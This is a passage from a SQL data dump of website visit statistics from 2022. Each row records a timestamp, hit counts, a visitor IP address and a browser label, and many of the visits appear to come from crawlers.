,0,0,'205.169.39.229','chrome'),(564212,1657840631,1,1,0,0,'205.169.39.53','chrome'),(564213,1657842223,1,1,0,0,'5.255.253.106','other'),(564214,1657849143,4,4,0,0,'45.142.122.34','chrome'),(564215,1657850919,2,2,0,0,'45.142.122.34','chrome'),(564216,1657851158,1,1,0,0,'66.249.70.79','chrome'),(564217,1657856528,1,1,0,0,'66.249.70.83','chrome'),(564218,1657858226,2,2,0,0,'45.142.122.34','chrome'),(564219,1657859059,1,0,1,0,'66.249.70.79',''),(564220,1657862365,1,1,0,0,'207.46.13.105','other'),(564221,1657862405,1,1,0,0,'45.142.122.34','chrome'),(564222,1657864643,1,1,0,0,'205.210.31.138','other'),(564223,1657869132,1,1,0,0,'194.38.20.161','other'),(564224,1657870994,1,1,0,0,'198.235.24.151','other'),(564225,1657873267,1,1,0,0,'77.83.7.242','other'),(564226,1657873268,1,1,0,0,'77.83.7.242','chrome'),(564227,1657877119,1,0,1,0,'66.249.70.83',''),(564228,1657877399,1,1,0,0,'18.236.212.173','chrome'),(564229,1657877437,1,1,0,0,'34.219.17.86','chrome'),(564230,1657881331,1,1,0,0,'66.249.70.75','chrome'),(564231,1657900544,1,1,0,0,'207.46.13.84','other'),(564232,1657903550,1,1,0,0,'87.250.224.64','other'),(564233,1657903985,7,7,0,0,'45.142.122.34','chrome'),(564234,1657909503,1,1,0,0,'66.249.66.93','chrome'),(564235,1657910266,1,1,0,0,'20.213.93.103','chrome'),(564236,1657911176,1,1,0,0,'20.213.93.103','chrome'),(564237,1657923299,1,1,0,0,'157.55.39.56','other'),(564238,1657930269,1,1,0,0,'65.21.206.42','chrome'),(564239,1657933914,1,1,0,0,'198.235.24.35','other'),(564240,1657939911,1,1,0,0,'87.250.224.22','other'),(564241,1657940894,1,1,0,0,'20.212.187.233','other'),(564242,1657945100,1,1,0,0,'77.83.7.242','msie'),(564243,1657945101,1,1,0,0,'77.83.7.242','other'),(564244,1657946648,1,1,0,0,'66.249.66.61','chrome'),(564245,1657946765,1,1,0,0,'66.249.66.7','chrome'),(564246,1657957199,1,1,0,0,'66.249.66.57','chrome'),(564247,1657960578,1,1,0,0,'95.108.213.39','other'),(564248,1657963045,1,0,1,0,'66.249.66.57',''),(564249,1657964250,1,1,0,0,'18.237.196.209','chrome'),(564250,1657964284,1,1,0,0,'34.211.49.164','chrome'),(564251,1657964372,1,1,0,0,'34.216.177.15','chrome'),(564252,1657964399,2,2,0,0,'34.220.107.144','chrome'),(564253,1657970687,6,6,0,0,'173.212.246.2','other'),(564254,1657971471,1,1,0,0,'185.181.61.24','chrome'),(564255,1657979754,1,1,0,0,'205.210.31.139','other'),(564256,1657987356,1,1,0,0,'111.90.145.188','firefox'),(564257,1657989435,1,1,0,0,'95.108.213.21','other'),(564258,1657990305,1,1,0,0,'65.21.206.43','chrome'),(564259,1657999442,1,1,0,0,'194.38.20.161','other'),(564260,1658001375,1,1,0,0,'207.46.13.105','other'),(564261,1658009252,1,1,0,0,'213.180.203.65','other'),(564262,1658023501,1,1,0,0,'5.45.207.134','chrome'),(564263,1658031508,1,1,0,0,'45.138.6.204','other'),(564264,1658031509,1,1,0,0,'45.138.6.204','chrome'),(564265,1658034411,2,0,2,0,'66.249.70.75',''),(564266,1658034421,1,1,0,0,'66.249.70.79','chrome'),(564267,1658049094,1,0,1,0,'66.249.70.75',''),(564268,1658051293,1,1,0,0,'34.208.117.247','chrome'),(564269,1658051355,1,1,0,0,'35.87.250.167','chrome'),(564270,1658051370,1,1,0,0,'35.88.164.183','chrome'),(564271,1658051391,2,2,0,0,'54.245.26.224','chrome'),(564272,1658051703,1,1,0,0,'34.211.201.213','chrome'),(564273,1658064535,2,2,0,0,'54.251.11.252','chrome'),(564274,1658064540,1,1,0,0,'54.251.11.252','other'),(564275,1658072413,1,1,0,0,'207.46.13.105','other'),(564276,1658079072,1,1,0,0,'158.255.80.210','firefox'),(564277,1658082146,1,1,0,0,'173.252.111.6','other'),(564278,1658088629,1,1,0,0,'65.154.226.220','chrome'),(564279,1658088654,1,1,0,0,'65.154.226.166','chrome'),(564280,1658098533,1,1,0,0,'65.21.206.46','chrome'),(564281,1658105600,6,6,0,0,'173.212.246.2','other'),(564282,1658113463,1,1,0,0,'193.233.177.194','chrome'),(564283,1658117914,1,1,0,0,'77.83.7.242','chrome'),(564284,1658117915,1,1,0,0,'77.83.7.242','firefox'),(564285,1658123395,1,1,0,0,'205.210.31.5','other'),(564286,1658128451,1,1,0,0,'194.38.20.161','other'),(564287,1658135253,2,0,2,0,'66.249.70.75',''),(564288,1658140636,1,1,0,0,'31.13.127.17','other'),(564289,1658143622,1,1,0,0,'198.235.24.17','other'),(564290,1658172611,2,2,0,0,'185.237.217.11','chrome'),(564291,1658181896,1,1,0,0,'34.172.37.71','chrome'),(564292,1658184140,1,1,0,0,'207.46.13.7','other'),(564293,1658184334,2,2,0,0,'65.154.226.220','chrome'),(564294,1658184374,1,1,0,0,'65.154.226.168','chrome'),(564295,1658217108,1,1,0,0,'205.210.31.152','other'),(564296,1658219954,5,5,0,0,'109.30.248.88','chrome'),(564297,1658223556,1,1,0,0,'34.216.20.62','chrome'),(564298,1658223557,1,1,0,0,'54.187.204.195','chrome'),(564299,1658223582,1,1,0,0,'52.12.164.140','chrome'),(564300,1658223597,2,2,0,0,'34.220.90.146','chrome'),(564301,1658229415,1,1,0,0,'198.235.24.8','other'),(564302,1658239793,6,6,0,0,'5.45.114.167','chrome'),(564304,1658239794,1,1,0,0,'5.45.114.167','other'),(564305,1658256016,1,1,0,0,'194.38.20.161','other'),(564306,1658257961,1,1,0,0,'173.252.111.17','other'),(564307,1658259300,1,1,0,0,'20.97.183.43','other'),(564308,1658260755,1,1,0,0,'123.253.33.101','firefox'),(564309,1658275921,6,6,0,0,'173.212.246.2','other'),(564310,1658281511,1,1,0,0,'141.8.142.76','chrome'),(564311,1658289189,2,2,0,0,'205.169.39.82','chrome'),(564312,1658289269,1,1,0,0,'65.154.226.166','chrome'),(564313,1658305299,1,1,0,0,'66.249.69.55','chrome'),(564314,1658305681,1,0,1,0,'66.249.69.57',''),(564315,1658310748,1,1,0,0,'35.87.125.34','chrome'),(564316,1658310753,1,1,0,0,'34.221.91.209','chrome'),(564317,1658310769,2,2,0,0,'52.36.151.151','chrome'),(564318,1658310781,2,2,0,0,'35.90.192.211','chrome'),(564319,1658322062,1,1,0,0,'66.102.9.170','chrome'),(564320,1658322063,2,2,0,0,'93.79.2.77','chrome'),(564321,1658325220,1,1,0,0,'207.46.13.211','other'),(564322,1658353594,1,1,0,0,'207.46.13.7','other'),(564323,1658360413,1,1,0,0,'207.46.13.7','other'),(564324,1658360789,2,2,0,0,'141.8.142.76','other'),(564325,1658362932,1,0,1,0,'66.249.76.71',''),(564326,1658363118,1,1,0,0,'66.249.70.75','chrome'),(564327,1658370326,1,0,1,0,'66.249.76.73',''),(564328,1658370537,1,0,1,0,'66.249.76.71',''),(564329,1658375578,5,5,0,0,'92.205.56.212','chrome'),(564330,1658388893,1,1,0,0,'65.21.206.44','chrome'),(564331,1658391158,1,1,0,0,'194.38.20.161','other'),(564332,1658401091,1,1,0,0,'91.196.178.169','chrome'),(564333,1658402571,1,1,0,0,'66.249.65.197','chrome'),(564334,1658417414,1,1,0,0,'194.242.10.226','firefox'),(564335,1658435518,2,2,0,0,'167.248.133.118','other'),(564336,1658449055,1,1,0,0,'66.249.65.5','chrome'),(564337,1658451311,1,1,0,0,'31.13.103.23','other'),(564338,1658476476,1,1,0,0,'91.196.178.169','chrome'),(564339,1658479006,1,1,0,0,'213.180.203.68','other'),(564340,1658480227,1,0,1,0,'66.249.65.199',''),(564341,1658481816,1,1,0,0,'35.91.168.78','chrome'),(564342,1658482802,1,1,0,0,'35.166.114.106','chrome'),(564343,1658482839,2,2,0,0,'54.201.204.57','chrome'),(564344,1658499239,2,2,0,0,'109.206.241.35','other'),(564345,1658505304,1,1,0,0,'185.237.217.11','chrome'),(564346,1658512048,1,1,0,0,'194.38.20.161','other'),(564347,1658515862,1,1,0,0,'66.249.76.73','chrome'),(564348,1658520510,1,1,0,0,'93.113.111.193','firefox'),(564349,1658521124,1,1,0,0,'205.210.31.140','other'),(564350,1658522053,1,1,0,0,'66.249.76.69','chrome'),(564351,1658524735,1,1,0,0,'64.246.165.160','firefox'),(564352,1658527031,1,1,0,0,'66.249.76.69','chrome'),(564353,1658527144,1,0,1,0,'66.249.64.103',''),(564354,1658534254,1,1,0,0,'66.249.76.73','chrome'),(564355,1658536090,1,1,0,0,'157.55.39.195','other'),(564356,1658547145,1,1,0,0,'66.249.76.69','chrome'),(564357,1658547840,1,1,0,0,'173.252.83.22','other'),(564358,1658552348,1,1,0,0,'20.106.125.178','chrome'),(564359,1658553710,1,1,0,0,'20.106.125.178','chrome'),(564360,1658555125,1,1,0,0,'157.55.39.195','other'),(564361,1658555164,1,1,0,0,'20.106.125.178','chrome'),(564362,1658556589,1,1,0,0,'20.106.125.178','chrome'),(564363,1658558003,1,1,0,0,'20.106.125.178','chrome'),(564364,1658559383,1,1,0,0,'20.106.125.178','chrome'),(564365,1658560860,1,1,0,0,'20.106.125.178','chrome'),(564366,1658566670,1,0,1,0,'66.249.76.69',''),(564367,1658569769,1,1,0,0,'34.209.126.238','chrome'),(564368,1658569770,1,1,0,0,'34.216.70.218','chrome'),(564369,1658569794,2,2,0,0,'35.91.52.125','chrome'),(564370,1658571753,1,1,0,0,'168.138.5.52','chrome'),(564371,1658572512,2,1,1,0,'66.249.76.71',''),(564372,1658584552,1,1,0,0,'66.249.76.71','chrome'),(564373,1658584558,1,1,0,0,'66.249.76.69','chrome'),(564374,1658595906,1,1,0,0,'205.210.31.10','other'),(564375,1658596696,1,0,1,0,'66.249.76.71',''),(564376,1658598040,1,1,0,0,'66.249.76.69','chrome'),(564377,1658602551,1,1,0,0,'207.46.13.134','other'),(564378,1658608747,1,1,0,0,'66.249.64.105','chrome'),(564379,1658619552,1,1,0,0,'3.123.41.142','firefox'),(564380,1658627669,1,1,0,0,'157.55.39.195','other'),(564381,1658645915,1,1,0,0,'185.237.217.11','chrome'),(564382,1658647927,1,1,0,0,'94.247.172.129','other'),(564383,1658652049,1,1,0,0,'198.235.24.2','other'),(564384,1658657694,1,1,0,0,'66.249.76.71','chrome'),(564385,1658658119,1,1,0,0,'31.13.127.120','other'),(564386,1658658120,1,1,0,0,'31.13.127.2','other'),(564388,1658661636,2,2,0,0,'173.252.107.22','other'),(564389,1658661637,1,1,0,0,'173.252.107.20','other'),(564391,1658661638,1,1,0,0,'173.252.107.12','other'),(564393,1658661716,1,1,0,0,'173.252.107.21','other'),(564394,1658662151,1,1,0,0,'34.223.63.251','chrome'),(564395,1658663203,1,0,1,0,'66.249.76.71',''),(564396,1658665000,1,1,0,0,'66.249.76.71','chrome'),(564397,1658685019,1,1,0,0,'185.237.217.11','chrome'),(564398,1658686788,1,1,0,0,'66.249.76.69','chrome'),(564399,1658693408,1,0,1,0,'66.249.76.69',''),(564400,1658693422,1,1,0,0,'66.249.76.71','chrome'),(564401,1658699306,1,1,0,0,'159.223.175.181','chrome'),(564402,1658705621,4,4,0,0,'54.176.69.113','firefox'),(564403,1658734930,1,1,0,0,'31.13.127.6','other'),(564404,1658734951,2,2,0,0,'31.13.127.119','other'),(564405,1658739302,1,1,0,0,'20.14.73.244','firefox'),(564406,1658739469,1,0,1,0,'66.249.76.73',''),(564407,1658739744,1,1,0,0,'66.249.76.73','chrome'),(564408,1658743588,1,1,0,0,'194.38.20.161','other'),(564409,1658749685,1,0,1,0,'66.249.76.69',''),(564410,1658750662,1,1,0,0,'157.55.39.195','other'),(564411,1658768989,1,1,0,0,'192.64.113.147','firefox'),(564412,1658786933,1,1,0,0,'51.158.108.77','other'),(564413,1658800190,1,1,0,0,'173.252.83.118','other'),(564414,1658821839,1,1,0,0,'212.47.251.118','other'),(564415,1658835241,1,0,1,0,'66.249.76.71',''),(564416,1658855474,1,1,0,0,'103.104.73.82','firefox'),(564417,1658860951,1,1,0,0,'87.250.224.7','other'),(564418,1658861372,1,1,0,0,'95.108.213.71','other'),(564419,1658883537,5,5,0,0,'3.133.134.235','chrome'),(564420,1658889585,1,1,0,0,'185.81.157.112','other'),(564421,1658903456,1,1,0,0,'66.249.76.73','chrome'),(564422,1658903569,1,1,0,0,'66.249.64.101','chrome'),(564423,1658907304,1,1,0,0,'74.208.30.51','firefox'),(564424,1658909097,1,1,0,0,'185.181.60.12','chrome'),(564425,1658921708,1,0,1,0,'66.249.76.71',''),(564426,1658921898,1,1,0,0,'66.249.76.69','chrome'),(564427,1658923614,1,1,0,0,'66.249.76.73','chrome'),(564428,1658938123,3,3,0,0,'180.245.193.208','other'),(564429,1658939449,1,1,0,0,'162.219.250.15','firefox'),(564430,1658942092,1,1,0,0,'185.237.217.11','chrome'),(564431,1658943405,1,1,0,0,'205.210.31.140','other'),(564432,1658951586,1,1,0,0,'5.45.207.87','other'),(564433,1658951720,1,1,0,0,'5.255.253.138','other'),(564434,1658956610,1,1,0,0,'66.249.76.73','chrome'),(564435,1658959484,10,10,0,0,'173.212.231.5','chrome'),(564436,1658965320,1,1,0,0,'66.249.76.73','chrome'),(564437,1658966244,1,1,0,0,'66.249.76.69','chrome'),(564438,1658984967,1,1,0,0,'66.249.76.71','chrome'),(564439,1658986624,1,1,0,0,'157.55.39.195','other'),(564440,1659001077,1,1,0,0,'34.221.128.233','chrome'),(564441,1659003517,1,1,0,0,'18.237.193.125','chrome'),(564442,1659006431,1,0,1,0,'66.249.79.147',''),(564443,1659006437,1,0,1,0,'66.249.79.145',''),(564444,1659012466,1,1,0,0,'188.163.114.106','chrome'),(564445,1659028190,1,1,0,0,'46.211.75.191','chrome'),(564446,1659033438,1,1,0,0,'51.15.251.143','other'),(564447,1659062848,1,1,0,0,'207.46.13.105','other'),(564448,1659074890,1,1,0,0,'66.249.79.131','chrome'),(564449,1659075166,1,1,0,0,'205.210.31.22','other'),(564450,1659082438,1,1,0,0,'66.249.79.135','chrome'),(564451,1659086783,1,0,1,0,'66.249.79.133',''),(564452,1659092691,1,0,1,0,'66.249.79.133',''),(564453,1659094239,1,1,0,0,'173.252.83.21','other'),(564454,1659094841,5,5,0,0,'92.205.56.212','chrome'),(564455,1659099725,1,1,0,0,'5.161.127.165','other'),(564456,1659100717,1,1,0,0,'87.250.224.79','other'),(564457,1659101203,1,0,1,0,'66.249.76.89',''),(564458,1659102652,1,1,0,0,'20.191.45.212','other'),(564459,1659118549,1,1,0,0,'66.249.76.69','chrome'),(564460,1659118649,1,1,0,0,'123.31.41.38','firefox'),(564461,1659122444,1,1,0,0,'76.72.172.166','firefox'),(564462,1659130653,1,1,0,0,'66.249.76.71','chrome'),(564463,1659147358,1,1,0,0,'66.249.76.73','chrome'),(564464,1659152771,1,1,0,0,'50.116.52.201','chrome'),(564465,1659164020,1,1,0,0,'31.13.127.16','other'),(564466,1659167942,4,4,0,0,'193.29.220.11','chrome'),(564467,1659171555,1,0,1,0,'66.249.76.69',''),(564468,1659175604,1,1,0,0,'66.249.76.73','chrome'),(564469,1659178167,1,0,1,0,'66.249.76.73',''),(564470,1659179809,1,1,0,0,'66.249.76.73','chrome'),(564471,1659202290,1,1,0,0,'138.128.173.10','firefox'),(564472,1659208175,1,1,0,0,'95.108.213.9','other'),(564473,1659212590,5,5,0,0,'35.209.181.3','chrome'),(564474,1659212660,1,1,0,0,'157.55.39.180','other'),(564475,1659225438,1,1,0,0,'207.46.13.105','other'),(564476,1659236649,1,1,0,0,'207.46.13.7','other'),(564477,1659237766,1,1,0,0,'66.249.64.105','chrome'),(564478,1659242719,1,0,1,0,'66.249.76.71',''),(564479,1659251390,1,1,0,0,'157.55.39.180','other'),(564480,1659260756,1,1,0,0,'35.91.66.164','chrome'),(564481,1659260757,1,1,0,0,'52.13.98.13','chrome'),(564482,1659260776,2,2,0,0,'35.160.133.50','chrome'),(564483,1659264617,1,0,1,0,'66.249.76.71',''),(564484,1659285708,1,1,0,0,'207.46.13.134','other'),(564485,1659305221,1,1,0,0,'66.249.76.73','chrome'),(564486,1659306248,48,48,0,0,'69.30.197.2','other'),(564487,1659306294,11,11,0,0,'69.30.197.2','chrome'),(564488,1659306788,1,1,0,0,'66.249.76.71','chrome'),(564489,1659324935,1,1,0,0,'66.249.76.71','chrome'),(564490,1659326666,1,1,0,0,'66.249.64.103','chrome'),(564491,1659329341,1,0,1,0,'66.249.76.73',''),(564492,1659330732,1,0,1,0,'66.249.76.69',''),(564493,1659333489,1,1,0,0,'66.249.76.73','chrome'),(564494,1659344874,1,1,0,0,'66.249.64.105','chrome'),(564495,1659350952,1,0,1,0,'66.249.69.221',''),(564496,1659350970,1,0,1,0,'66.249.69.217',''),(564497,1659357679,1,1,0,0,'205.210.31.152','other'),(564498,1659361928,1,1,0,0,'66.249.69.221','chrome'),(564499,1659362264,1,0,1,0,'66.249.69.217',''),(564500,1659365159,1,0,1,0,'66.249.69.219',''),(564501,1659370461,11,11,0,0,'95.108.213.50','other'),(564502,1659370564,3,3,0,0,'213.180.203.75','other'),(564503,1659370567,3,3,0,0,'87.250.224.63','other'),(564504,1659370605,2,2,0,0,'141.8.142.88','other'),(564505,1659371059,1,1,0,0,'95.108.213.12','other'),(564506,1659371137,1,1,0,0,'87.250.224.62','other'),(564507,1659371138,1,1,0,0,'5.45.207.131','other'),(564508,1659371139,1,1,0,0,'87.250.224.143','other'),(564509,1659374912,1,1,0,0,'31.13.127.13','other'),(564510,1659378438,1,1,0,0,'109.228.50.190','firefox'),(564511,1659380759,1,1,0,0,'213.180.203.75','other'),(564512,1659380827,1,1,0,0,'141.8.142.88','other'),(564513,1659412139,1,0,1,0,'66.249.69.59',''),(564514,1659412156,1,1,0,0,'66.249.69.59','chrome'),(564515,1659419081,1,1,0,0,'31.13.127.8','other'),(564516,1659419126,1,1,0,0,'207.46.13.7','other'),(564517,1659420956,1,1,0,0,'207.46.13.134','other'),(564518,1659429782,2,2,0,0,'46.211.79.112','chrome'),(564519,1659433628,1,1,0,0,'69.63.184.117','other'),(564520,1659436807,1,0,1,0,'66.249.69.59',''),(564521,1659439767,1,1,0,0,'157.55.39.229','other'),(564522,1659448923,1,1,0,0,'66.249.66.159','chrome'),(564523,1659454622,1,1,0,0,'185.208.79.215','firefox'),(564524,1659454807,1,1,0,0,'205.210.31.24','other'),(564525,1659499921,1,1,0,0,'173.252.107.18','other'),(564526,1659512142,1,1,0,0,'31.13.127.16','other'),(564527,1659515978,1,1,0,0,'91.196.178.169','chrome'),(564528,1659522210,1,1,0,0,'5.45.207.95','other'),(564529,1659523258,1,0,1,0,'66.249.66.59',''),(564530,1659524571,1,1,0,0,'185.249.163.66','chrome'),(564531,1659538686,1,1,0,0,'141.43.203.226','firefox'),(564532,1659544262,1,1,0,0,'154.6.22.10','chrome'),(564533,1659554017,1,1,0,0,'157.55.39.195','other'),(564534,1659562904,1,1,0,0,'157.55.39.195','other'),(564535,1659567346,1,1,0,0,'198.235.24.22','other'),(564536,1659578378,1,1,0,0,'205.210.31.10','other'),(564537,1659580096,1,1,0,0,'66.249.66.61','chrome'),(564538,1659604887,1,1,0,0,'34.222.95.50','chrome'),(564539,1659605428,1,1,0,0,'52.25.240.204','chrome'),(564540,1659607678,1,1,0,0,'66.249.66.61','chrome'),(564541,1659609530,1,0,1,0,'66.249.66.57',''),(564542,1659614855,1,1,0,0,'87.250.224.154','other'),(564543,1659616706,1,1,0,0,'66.249.66.158','chrome'),(564544,1659620194,1,1,0,0,'66.249.66.61','chrome'),(564545,1659627319,1,1,0,0,'66.249.66.211','chrome'),(564546,1659627684,1,1,0,0,'66.249.66.93','chrome'),(564547,1659629331,1,1,0,0,'39.98.207.234','firefox'),(564548,1659632520,2,2,0,0,'208.67.106.91','chrome'),(564549,1659650636,1,1,0,0,'87.250.224.154','other'),(564550,1659658419,1,1,0,0,'66.249.66.5','chrome'),(564551,1659667100,1,0,1,0,'66.249.66.61',''),(564552,1659682750,1,1,0,0,'194.38.20.161','other'),(564553,1659684975,1,1,0,0,'157.55.39.195','other'),(564554,1659687312,1,1,0,0,'66.249.66.61','chrome'),(564555,1659696237,1,0,1,0,'66.249.66.59',''),(564556,1659700752,1,1,0,0,'205.210.31.33','other'),(564557,1659714482,1,1,0,0,'31.13.103.20','other'),(564558,1659718929,1,1,0,0,'93.113.111.100','firefox'),(564559,1659719370,12,12,0,0,'213.226.123.153','chrome'),(564560,1659725254,37,37,0,0,'167.99.143.63','chrome'),(564561,1659730294,1,1,0,0,'66.249.66.92','chrome'),(564562,1659730934,1,1,0,0,'157.55.39.195','other'),(564563,1659734683,1,1,0,0,'205.210.31.156','other'),(564564,1659736951,5,5,0,0,'135.181.79.83','chrome'),(564565,1659740479,1,1,0,0,'66.249.66.7','chrome'),(564566,1659747906,1,1,0,0,'87.250.224.149','other'),(564567,1659747936,1,1,0,0,'213.180.203.77','other'),(564568,1659747938,1,1,0,0,'87.250.224.195','other'),(564569,1659747940,1,1,0,0,'5.255.253.90','other'),(564570,1659747942,1,1,0,0,'141.8.142.92','other'),(564571,1659747943,1,1,0,0,'95.108.213.31','other'),(564572,1659747945,1,1,0,0,'5.45.207.111','other'),(564573,1659747947,1,1,0,0,'5.255.253.171','other'),(564574,1659747949,1,1,0,0,'5.255.253.103','other'),(564575,1659747951,1,1,0,0,'5.255.253.153','other'),(564576,1659747952,1,1,0,0,'5.255.253.129','other'),(564577,1659747954,1,1,0,0,'213.180.203.62','other'),(564578,1659749041,2,2,0,0,'159.65.39.111','chrome'),(564579,1659756063,1,1,0,0,'66.249.66.57','chrome'),(564580,1659757223,1,1,0,0,'198.235.24.159','other'),(564581,1659764870,5,5,0,0,'135.181.79.83','chrome'),(564582,1659772290,1,1,0,0,'157.55.39.13','other'),(564583,1659781332,1,0,1,0,'66.249.66.59',''),(564584,1659781788,2,1,1,0,'66.249.66.59',''),(564585,1659783530,1,1,0,0,'185.181.60.39','chrome'),(564586,1659799285,1,1,0,0,'178.133.217.68','chrome'),(564587,1659800519,2,2,0,0,'54.236.39.87','other'),(564588,1659800826,116,116,0,0,'54.236.39.87','opera'),(564589,1659800828,96,96,0,0,'54.236.39.87','firefox'),(564590,1659800829,102,102,0,0,'54.236.39.87','chrome'),(564595,1659805505,1,1,0,0,'52.152.164.164','chrome'),(564596,1659806726,1,1,0,0,'66.249.64.105','chrome'),(564597,1659809320,1,1,0,0,'106.14.141.22','firefox'),(564598,1659810878,10,10,0,0,'173.212.231.5','chrome'),(564599,1659849599,1,1,0,0,'87.250.224.8','other'),(564600,1659859541,5,5,0,0,'20.230.127.127','chrome'),(564601,1659861346,1,0,1,0,'66.249.64.105',''),(564602,1659865516,1,1,0,0,'31.144.4.224','chrome'),(564603,1659866733,1,0,1,0,'66.249.64.105',''),(564604,1659868742,1,1,0,0,'66.249.64.105','chrome'),(564605,1659900857,1,1,0,0,'207.55.244.15','firefox'),(564606,1659907050,1,0,1,0,'66.249.64.103',''),(564607,1659907066,1,1,0,0,'66.249.64.101','chrome'),(564608,1659922828,1,1,0,0,'87.250.224.86','other'),(564609,1659952588,1,0,1,0,'66.249.64.103',''),(564610,1659952590,1,0,1,0,'66.249.64.101',''),(564611,1659971902,1,1,0,0,'66.249.64.101','chrome'),(564612,1659974855,1,1,0,0,'66.249.64.105','chrome'),(564613,1659980512,1,1,0,0,'198.211.125.40','firefox'),(564614,1659996082,5,5,0,0,'113.31.119.155','chrome'),(564615,1659996391,1,1,0,0,'66.249.64.103','chrome'),(564616,1659998012,1,1,0,0,'66.249.64.103','chrome'),(564617,1659999502,1,1,0,0,'65.21.206.46','chrome'),(564618,1660000489,1,1,0,0,'66.249.64.105','chrome'),(564619,1660018011,1,1,0,0,'157.55.39.28','other'),(564620,1660023987,1,1,0,0,'194.38.20.161','other'),(564621,1660031083,1,1,0,0,'88.118.177.36','other'),(564622,1660031254,1,1,0,0,'193.239.217.113','chrome'),(564623,1660037395,1,0,1,0,'66.249.64.105',''),(564624,1660037992,2,2,0,0,'195.182.202.228','chrome'),(564625,1660038270,1,1,0,0,'54.244.152.5','chrome'),(564626,1660038276,1,1,0,0,'34.212.238.149','chrome'),(564627,1660038292,1,1,0,0,'54.148.41.213','chrome'),(564628,1660038317,2,2,0,0,'35.90.179.181','chrome'),(564629,1660038326,2,2,0,0,'35.92.24.244','chrome'),(564630,1660039433,1,1,0,0,'205.210.31.22','other'),(564631,1660054334,1,1,0,0,'213.226.123.153','chrome'),(564632,1660054336,2,2,0,0,'213.226.123.153','firefox'),(564633,1660054611,1,1,0,0,'52.152.164.164','other'),(564634,1660055750,1,0,1,0,'66.249.64.101',''),(564635,1660062965,1,1,0,0,'168.119.60.81','chrome'),(564636,1660067519,1,1,0,0,'213.226.123.153','chrome'),(564637,1660075759,1,1,0,0,'52.152.164.164','firefox'),(564638,1660093630,1,1,0,0,'66.249.64.101','chrome'),(564639,1660095338,5,5,0,0,'18.222.114.63','chrome'),(564640,1660099127,4,4,0,0,'40.118.53.187','chrome'),(564641,1660114230,1,1,0,0,'40.80.84.183','chrome'),(564642,1660116935,1,1,0,0,'157.55.39.13','other'),(564643,1660122094,1,0,1,0,'66.249.64.105',''),(564644,1660128910,1,1,0,0,'65.21.206.43','chrome'),(564645,1660133795,1,1,0,0,'207.46.13.134','other'),(564646,1660134354,1,1,0,0,'184.94.240.88','firefox'),(564647,1660144668,1,1,0,0,'194.38.20.161','other'),(564648,1660155419,1,1,0,0,'3.95.196.29','other'),(564649,1660156633,1,1,0,0,'69.171.249.24','other'),(564650,1660170736,1,1,0,0,'143.198.3.70','other'),(564651,1660176856,1,1,0,0,'143.198.9.19','other'),(564652,1660190375,1,1,0,0,'45.8.68.54','chrome'),(564653,1660199091,1,1,0,0,'20.25.183.51','chrome'),(564654,1660201752,1,1,0,0,'69.171.249.1','other'),(564655,1660206915,1,0,1,0,'66.249.70.37',''),(564656,1660238021,1,1,0,0,'47.107.33.26','firefox'),(564657,1660263896,1,1,0,0,'66.249.70.37','chrome'),(564658,1660264946,1,1,0,0,'66.249.70.37','chrome'),(564659,1660278580,1,1,0,0,'66.249.70.41','chrome'),(564660,1660287169,1,0,1,0,'66.249.70.37',''),(564661,1660292283,1,0,1,0,'66.249.70.39',''),(564662,1660297595,1,1,0,0,'35.92.97.195','chrome'),(564663,1660297596,1,1,0,0,'35.89.144.232','chrome'),(564664,1660297641,1,1,0,0,'35.90.30.34','chrome'),(564665,1660297674,2,2,0,0,'52.35.106.112','chrome'),(564666,1660312211,2,2,0,0,'217.160.67.80','chrome'),(564667,1660316966,3,3,0,0,'185.237.217.11','chrome'),(564668,1660322719,1,1,0,0,'185.237.217.11','chrome'),(564669,1660324805,1,1,0,0,'173.252.83.119','other'),(564670,1660326112,1,1,0,0,'62.109.5.125','firefox'),(564671,1660327665,1,1,0,0,'46.211.67.30','other'),(564672,1660333699,1,1,0,0,'207.46.13.134','other'),(564673,1660340270,1,0,1,0,'66.249.70.39',''),(564674,1660360401,2,2,0,0,'5.45.207.142','other'),(564675,1660366714,2,2,0,0,'194.44.170.105','chrome'),(564676,1660374436,1,1,0,0,'194.38.20.161','other'),(564677,1660377065,1,0,1,0,'66.249.70.39',''),(564678,1660405944,1,0,1,0,'66.249.70.41',''),(564679,1660406223,1,1,0,0,'66.249.70.39','chrome'),(564680,1660412955,1,1,0,0,'198.235.24.17','other'),(564681,1660413608,2,2,0,0,'205.185.121.69','chrome'),(564682,1660420814,1,1,0,0,'216.145.5.42','firefox'),(564683,1660424947,1,1,0,0,'65.21.206.45','chrome'),(564684,1660441469,1,1,0,0,'207.46.13.134','chrome'),(564685,1660442950,1,1,0,0,'45.156.185.9','firefox'),(564686,1660449533,1,1,0,0,'198.235.24.130','other'),(564687,1660453881,1,1,0,0,'65.21.206.45','chrome'),(564688,1660461213,1,1,0,0,'65.21.206.45','chrome'),(564689,1660462925,6,6,0,0,'205.185.121.69','chrome'),(564690,1660462957,1,0,1,0,'66.249.70.41',''),(564691,1660463109,2,2,0,0,'209.141.51.222','chrome'),(564692,1660479095,1,1,0,0,'66.249.66.61','chrome'),(564693,1660479217,1,1,0,0,'66.249.66.59','chrome'),(564694,1660495525,1,1,0,0,'207.46.13.134','other'),(564695,1660502262,1,1,0,0,'194.38.20.161','other'),(564696,1660505830,1,1,0,0,'65.21.206.45','chrome'),(564697,1660508656,1,1,0,0,'207.46.13.7','other'),(564698,1660509130,1,1,0,0,'173.252.111.13','other'),(564699,1660512380,1,1,0,0,'66.249.66.209','chrome'),(564700,1660517222,1,1,0,0,'66.249.66.59','chrome'),(564701,1660529051,1,1,0,0,'66.249.66.207','chrome'),(564702,1660534108,1,1,0,0,'207.46.13.7','other'),(564703,1660535536,1,1,0,0,'20.89.139.140','chrome'),(564704,1660535752,1,1,0,0,'66.249.66.92','chrome'),(564705,1660547813,1,0,1,0,'66.249.66.61',''),(564706,1660547815,1,0,1,0,'66.249.66.59',''),(564707,1660552648,1,1,0,0,'91.196.178.169','chrome'),(564708,1660553753,1,1,0,0,'207.46.13.96','other'),(564709,1660561513,1,1,0,0,'69.171.249.20','other'),(564710,1660561966,1,1,0,0,'104.37.168.43','other'),(564711,1660562038,2,2,0,0,'209.141.41.193','chrome'),(564712,1660563571,2,2,0,0,'209.141.51.222','chrome'),(564713,1660565027,1,1,0,0,'31.13.127.20','other'),(564714,1660568982,1,1,0,0,'77.52.64.14','chrome'),(564715,1660570213,1,1,0,0,'207.46.13.134','other'),(564716,1660581950,1,1,0,0,'128.199.80.18','firefox'),(564717,1660593298,1,1,0,0,'159.223.36.12','firefox'),(564718,1660595438,1,1,0,0,'207.46.13.7','other'),(564719,1660608022,1,1,0,0,'20.198.90.220','chrome'),(564720,1660623083,1,1